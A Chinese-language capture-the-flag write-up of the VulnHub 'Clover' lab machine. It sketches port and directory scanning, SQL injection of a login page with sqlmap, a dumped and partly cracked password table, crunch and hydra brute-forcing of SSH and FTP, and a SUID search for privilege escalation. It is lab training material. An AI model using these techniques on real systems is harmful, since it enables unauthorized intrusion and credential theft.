vulnhub-Clover
title: vulnhub-Clover
tags: Vulnhub
abbrlink: 4f21715b
date: 2023-02-03 09:35:27
描述
信息收集
存活
靶机 192.168.169.230
kali 192.168.169.220
靶机扫描
端口
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
80/tcp open http
110/tcp closed pop3
443/tcp closed https
8080/tcp closed http-proxy
访问
ftp
目录扫描
CFIDE/Administrator/
phpmyadmin/index.php
website
这些都是网页,感觉可以继续往下目录扫描
CFIDE website
一个登录框
http://192.168.169.230/CFIDE/Administrator/login.php
- 爆破或者注入
尝试sql注入
- bp抓包,post注入
sqlmap -r 1.txt --dbs
id | password | username |
+----+----------------------------------+-----------+
| 1 | 33a41c7507cy5031d9tref6fdb31880c | 0xBush1do |
| 2 | 69a41c7507ad7031d9decf6fdb31810c | asta |
| 3 | 92ift37507ad7031d9decf98setf4w0c | 0xJin
解密
- 只有一条解开
69a41c7507ad7031d9decf6fdb31810c asta$$123
登录
- 网页登录,不能用
http://192.168.169.230/CFIDE/Administrator/login.php
- ssh 登录
成功登录
另一个用户
P4SsW0rD****
不知后面的密码,使用crunch生成密码字典
- 密码字典这个样子
使用hydra爆破
进行
ssh的密码爆破,但是爆破失败ftp服务也是开启的,于是把服务换成了ftp登录
ssh还是这个密码
提权
- 找有root权限的suid文件
find / -perm -u=s -type f 2>/dev/null
来自百度
Lua 是一个小巧的脚本语言。Lua由标准C编写而成,几乎在所有操作系统和平台上都可以编译,运行。Lua并没有提供强大的库,这是由它的定位决定的。所以Lua不适合作为开发独立应用程序的语言。Lua脚本可以很容易的被C/C++代码调用,也可以反过来调用C/C++的函数,这使得Lua在应用程序中可以被广泛应用。不仅仅作为扩展脚本,也可以作为普通的配置文件,代替XML,Ini等文件格式,并且更容易理解和维护。一个完整的Lua解释器不过200k,在目前所有脚本引擎中,Lua的速度是最快的。这一切都决定了Lua是作为嵌入式脚本的最佳选择。很多应用程序使用LUA作为自己的嵌入式脚本语言,以此来实现可配置性、可扩展性。这其中包括魔兽世界、博德之门、愤怒的小鸟等。
漏洞利用
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 putdown.top
